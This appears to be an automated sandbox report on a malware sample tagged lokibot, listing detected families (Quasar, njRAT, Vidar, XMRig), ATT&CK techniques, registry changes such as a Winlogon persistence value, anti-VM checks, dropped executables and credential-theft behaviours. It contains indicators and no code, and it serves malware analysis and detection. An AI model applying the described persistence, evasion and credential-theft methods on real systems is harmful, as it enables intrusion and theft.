lokibot | 9f9cfe42a0768cc02609fcabf58b8ccce826d5d768e8c6d3a6728f543c4eac53

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\boot.exe,C:\\Program Files (x86)\\CSMClient\\CyberStation.exe,"	reg.exe

Njrat family
njrat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001900000002ac6f-6453.dat	family_quasar
behavioral1/memory/5864-6463-0x0000000000EF0000-0x0000000001214000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 864 created 3264	864	Winsvc.exe	53

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xmrig family
xmrig
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unik.exe

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral1/memory/1844-6510-0x00007FF668FA0000-0x00007FF669BF0000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

flow	pid	Process
173	3124	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2940	powershell.exe
3124	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

credential_access stealer

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3848	netsh.exe

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
4512	icacls.exe
2372	icacls.exe
5572	icacls.exe
640	takeown.exe

Uses browser remote debugging 2 TTPs 10 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
228	chrome.exe
1844	chrome.exe
2960	msedge.exe
4396	msedge.exe
4900	msedge.exe
4120	chrome.exe
3996	chrome.exe
4708	chrome.exe
884	msedge.exe
984	msedge.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x001900000002ac78-191.dat	net_reactor
behavioral1/memory/4912-198-0x0000000000F50000-0x0000000000F9E000-memory.dmp	net_reactor

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x001900000002ad54-6365.dat	aspack_v212_v242

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unik.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unik.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StackTrace.vbs	Winsvc.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\stacktrace.vbs	taskmgr.exe

Executes dropped EXE 53 IoCs

pid	Process
1660	dsd.exe
2372	gvndxfghs.exe
3100	gvndxfghs.exe
4576	gvndxfghs.exe
4516	gvndxfghs.exe
4912	GOLD.exe
4524	svchost.exe
4540	nc64.exe
3544	bp.exe
3756	hack1226.exe
4892	TPB-1.exe
3056	c1.exe
3116	9758xBqgE1azKnB.exe
1704	PCclear_Eng_mini.exe
1208	winbox.exe
392	ew.exe
4936	unik.exe
864	Winsvc.exe
5736	svchost.exe
5388	ew.exe
5588	ipscan221.exe
5816	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
4824	build.exe
5824	shell.exe
6128	LedgerUpdater.exe
3704	ITplan.exe
5264	boot.exe
5752	wget.exe
5780	InstallSetup.exe
2332	me.exe
5888	NBYS%20ASM.NET.exe
2856	wow.exe
1844	xblkpfZ8Y4.exe
3616	wget.exe
5864	SGVP%20Client%20Users.exe
5496	FACTURA09876567000.bat
3168	wget.exe
2388	wget.exe
5924	run.exe
6076	run2.exe
5916	wget.exe
1092	wallx.exe
236	wget.exe
4708	WallpaperX.exe
564	wget.exe
5660	wget.exe
4712	wget.exe
5676	FixCSM.exe
4440	Coc Coc.exe
3516	portable_util.exe
4476	setup.exe
5568	setup.exe
6104	del.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Wine	unik.exe

Loads dropped DLL 28 IoCs

pid	Process
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
3516	take3.exe
2856	wow.exe
2856	wow.exe

Modifies file permissions 1 TTPs 4 IoCs

File and Directory Permissions Modification

T1222

pid	Process
2372	icacls.exe
5572	icacls.exe
640	takeown.exe
4512	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x001900000002ac91-360.dat	vmprotect
behavioral1/files/0x001900000002ac91-2140.dat	vmprotect
behavioral1/memory/5736-2147-0x00007FF6AA170000-0x00007FF6AA3A7000-memory.dmp	vmprotect
behavioral1/memory/5736-2156-0x00007FF6AA170000-0x00007FF6AA3A7000-memory.dmp	vmprotect

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	gvndxfghs.exe
Key opened	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	gvndxfghs.exe
Key opened	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	gvndxfghs.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\Q:	mstsc.exe
File opened (read-only)	\??\V:	mstsc.exe
File opened (read-only)	\??\X:	mstsc.exe
File opened (read-only)	\??\Y:	mstsc.exe
File opened (read-only)	\??\E:	mstsc.exe
File opened (read-only)	\??\H:	mstsc.exe
File opened (read-only)	\??\O:	mstsc.exe
File opened (read-only)	\??\W:	mstsc.exe
File opened (read-only)	\??\Z:	mstsc.exe
File opened (read-only)	\??\B:	mstsc.exe
File opened (read-only)	\??\J:	mstsc.exe
File opened (read-only)	\??\N:	mstsc.exe
File opened (read-only)	\??\T:	mstsc.exe
File opened (read-only)	\??\U:	mstsc.exe
File opened (read-only)	\??\G:	mstsc.exe
File opened (read-only)	\??\R:	mstsc.exe
File opened (read-only)	\??\S:	mstsc.exe
File opened (read-only)	\??\L:	mstsc.exe
File opened (read-only)	\??\M:	mstsc.exe
File opened (read-only)	\??\P:	mstsc.exe
File opened (read-only)	\??\A:	mstsc.exe
File opened (read-only)	\??\I:	mstsc.exe
File opened (read-only)	\??\K:	mstsc.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
1	raw.githubusercontent.com
82	raw.githubusercontent.com
83	raw.githubusercontent.com
84	raw.githubusercontent.com
105	raw.githubusercontent.com
137	pastebin.com
173	pastebin.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

Network Service Discovery

T1046

pid	Process
5264	GameBarPresenceWriter.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/5496-6469-0x0000000000F50000-0x000000000107E000-memory.dmp	autoit_exe
behavioral1/memory/5496-6473-0x0000000000F50000-0x000000000107E000-memory.dmp	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\del.exe	wget.exe
File opened for modification	C:\Windows\System32\del.exe	wget.exe
File created	C:\windows\system32\boot.exe	cmd.exe
File opened for modification	C:\windows\system32\boot.exe	cmd.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\images\\BG.jpg"	WallpaperX.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4936	unik.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2372 set thread context of 3100	2372	gvndxfghs.exe	88
PID 2372 set thread context of 4576	2372	gvndxfghs.exe	89
PID 2372 set thread context of 4516	2372	gvndxfghs.exe	90
PID 864 set thread context of 4184	864	Winsvc.exe	184
PID 4184 set thread context of 5640	4184	InstallUtil.exe	235

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00060000000259e6-815.dat	upx
behavioral1/memory/1208-820-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral1/memory/1208-933-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral1/files/0x001a00000002ad52-2175.dat	upx
behavioral1/memory/5588-2181-0x0000000000400000-0x000000000044B000-memory.dmp	upx
behavioral1/files/0x001a00000002ad58-2210.dat	upx
behavioral1/memory/4824-2214-0x00000000001A0000-0x00000000003E8000-memory.dmp	upx
behavioral1/memory/4824-2312-0x00000000001A0000-0x00000000003E8000-memory.dmp	upx
behavioral1/memory/5588-2445-0x0000000000400000-0x000000000044B000-memory.dmp	upx
behavioral1/files/0x001900000002ac75-6441.dat	upx
behavioral1/memory/1844-6445-0x00007FF668FA0000-0x00007FF669BF0000-memory.dmp	upx
behavioral1/memory/5496-6469-0x0000000000F50000-0x000000000107E000-memory.dmp	upx
behavioral1/memory/5496-6473-0x0000000000F50000-0x000000000107E000-memory.dmp	upx
behavioral1/memory/1844-6510-0x00007FF668FA0000-0x00007FF669BF0000-memory.dmp	upx
behavioral1/memory/5588-6621-0x0000000000400000-0x000000000044B000-memory.dmp	upx

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\CocCoc\Browser\Application	cmd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 3 IoCs

pid	pid_target	Process	procid_target
4752	4912	WerFault.exe	91
6016	5816	WerFault.exe	164
5268	4936	WerFault.exe	157

System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gvndxfghs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hack1226.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wow.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FACTURA09876567000.bat
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9758xBqgE1azKnB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipscan221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	me.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PCclear_Eng_mini.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LedgerUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ITplan.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	run.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winbox.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	portable_util.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gvndxfghs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GOLD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	del.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dsd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TPB-1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	unik.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NBYS%20ASM.NET.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

Internet Connection Discovery

T1016.001

pid	Process
1748	PING.EXE
2880	PING.EXE
2960	cmd.exe
5224	PING.EXE

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\TSRedirFlags	mstsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\Device Parameters	mstsc.exe
Key security queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters	mstsc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters\TSRedirFlags	mstsc.exe
Key security queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	mstsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\Device Parameters	mstsc.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TPB-1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	TPB-1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe

Delays execution with timeout.exe 5 IoCs

pid	Process
6008	timeout.exe
4808	timeout.exe
5432	timeout.exe
5944	timeout.exe
5124	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}\Compatibility Flags = "1024"	PCclear_Eng_mini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}	PCclear_Eng_mini.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772324414262944"	chrome.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings	take3.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4018527317-446799424-2810249686-1000\{27638E23-DFCC-449C-84C9-501570AB05D1}	svchost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3544	NOTEPAD.EXE

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
1748	PING.EXE
2880	PING.EXE
5224	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3192	mstsc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2940	powershell.exe
2940	powershell.exe
3124	powershell.exe
3124	powershell.exe
4408	powershell.exe
4408	powershell.exe
4892	TPB-1.exe
4892	TPB-1.exe
4892	TPB-1.exe
4892	TPB-1.exe
4120	chrome.exe
4120	chrome.exe
4892	TPB-1.exe
4892	TPB-1.exe
4892	TPB-1.exe
4892	TPB-1.exe
4772	msedge.exe
4772	msedge.exe
884	msedge.exe
884	msedge.exe
4936	unik.exe
4936	unik.exe
4892	TPB-1.exe
4892	TPB-1.exe
3116	9758xBqgE1azKnB.exe
3116	9758xBqgE1azKnB.exe
3116	9758xBqgE1azKnB.exe
3116	9758xBqgE1azKnB.exe
3116	9758xBqgE1azKnB.exe
4824	build.exe
4824	build.exe
3116	9758xBqgE1azKnB.exe
3116	9758xBqgE1azKnB.exe
4824	build.exe
4824	build.exe
4824	build.exe
4824	build.exe
3116	9758xBqgE1azKnB.exe
864	Winsvc.exe
864	Winsvc.exe
3116	9758xBqgE1azKnB.exe
3116	9758xBqgE1azKnB.exe
5392	taskmgr.exe
5392	taskmgr.exe
4892	TPB-1.exe
4892	TPB-1.exe
3116	9758xBqgE1azKnB.exe
3116	9758xBqgE1azKnB.exe
3116	9758xBqgE1azKnB.exe
3116	9758xBqgE1azKnB.exe
5392	taskmgr.exe
5392	taskmgr.exe
3116	9758xBqgE1azKnB.exe
5392	taskmgr.exe
5392	taskmgr.exe
4184	InstallUtil.exe
4184	InstallUtil.exe
5392	taskmgr.exe
3116	9758xBqgE1azKnB.exe
5392	taskmgr.exe
5392	taskmgr.exe
3116	9758xBqgE1azKnB.exe
4184	InstallUtil.exe
4184	InstallUtil.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5588	ipscan221.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	2940	powershell.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	2372	gvndxfghs.exe
Token: SeDebugPrivilege	4912	GOLD.exe
Token: SeDebugPrivilege	4408	powershell.exe
Token: SeDebugPrivilege	4524	svchost.exe
Token: 33	4524	svchost.exe
Token: SeIncBasePriorityPrivilege	4524	svchost.exe
Token: SeShutdownPrivilege	4120	chrome.exe
Token: SeCreatePagefilePrivilege	4120	chrome.exe
Token: SeShutdownPrivilege	4120	chrome.exe
Token: SeCreatePagefilePrivilege	4120	chrome.exe
Token: SeShutdownPrivilege	4120	chrome.exe
Token: SeCreatePagefilePrivilege	4120	chrome.exe
Token: SeShutdownPrivilege	4120	chrome.exe
Token: SeCreatePagefilePrivilege	4120	chrome.exe
Token: SeShutdownPrivilege	4120	chrome.exe
Token: SeCreatePagefilePrivilege	4120	chrome.exe
Token: SeShutdownPrivilege	4120	chrome.exe
Token: SeCreatePagefilePrivilege	4120	chrome.exe
Token: 33	4524	svchost.exe
Token: SeIncBasePriorityPrivilege	4524	svchost.exe
Token: SeShutdownPrivilege	4120	chrome.exe
Token: SeCreatePagefilePrivilege	4120	chrome.exe
Token: 33	4524	svchost.exe
Token: SeIncBasePriorityPrivilege	4524	svchost.exe
Token: SeDebugPrivilege	3116	9758xBqgE1azKnB.exe
Token: 33	4524	svchost.exe
Token: SeIncBasePriorityPrivilege	4524	svchost.exe
Token: SeDebugPrivilege	864	Winsvc.exe
Token: SeDebugPrivilege	3100	gvndxfghs.exe
Token: 33	4524	svchost.exe
Token: SeIncBasePriorityPrivilege	4524	svchost.exe
Token: SeDebugPrivilege	864	Winsvc.exe
Token: SeDebugPrivilege	5392	taskmgr.exe
Token: SeSystemProfilePrivilege	5392	taskmgr.exe
Token: SeCreateGlobalPrivilege	5392	taskmgr.exe
Token: 33	4524	svchost.exe
Token: SeIncBasePriorityPrivilege	4524	svchost.exe
Token: SeDebugPrivilege	4184	InstallUtil.exe
Token: 33	4524	svchost.exe
Token: SeIncBasePriorityPrivilege	4524	svchost.exe
Token: SeLockMemoryPrivilege	1844	xblkpfZ8Y4.exe
Token: SeLockMemoryPrivilege	1844	xblkpfZ8Y4.exe
Token: SeDebugPrivilege	5864	SGVP%20Client%20Users.exe
Token: SeLockMemoryPrivilege	5640	AddInProcess.exe
Token: SeLockMemoryPrivilege	5640	AddInProcess.exe
Token: SeDebugPrivilege	4708	WallpaperX.exe
Token: SeTakeOwnershipPrivilege	640	takeown.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
4120	chrome.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
884	msedge.exe
3192	mstsc.exe
3192	mstsc.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5780	InstallSetup.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5496	FACTURA09876567000.bat
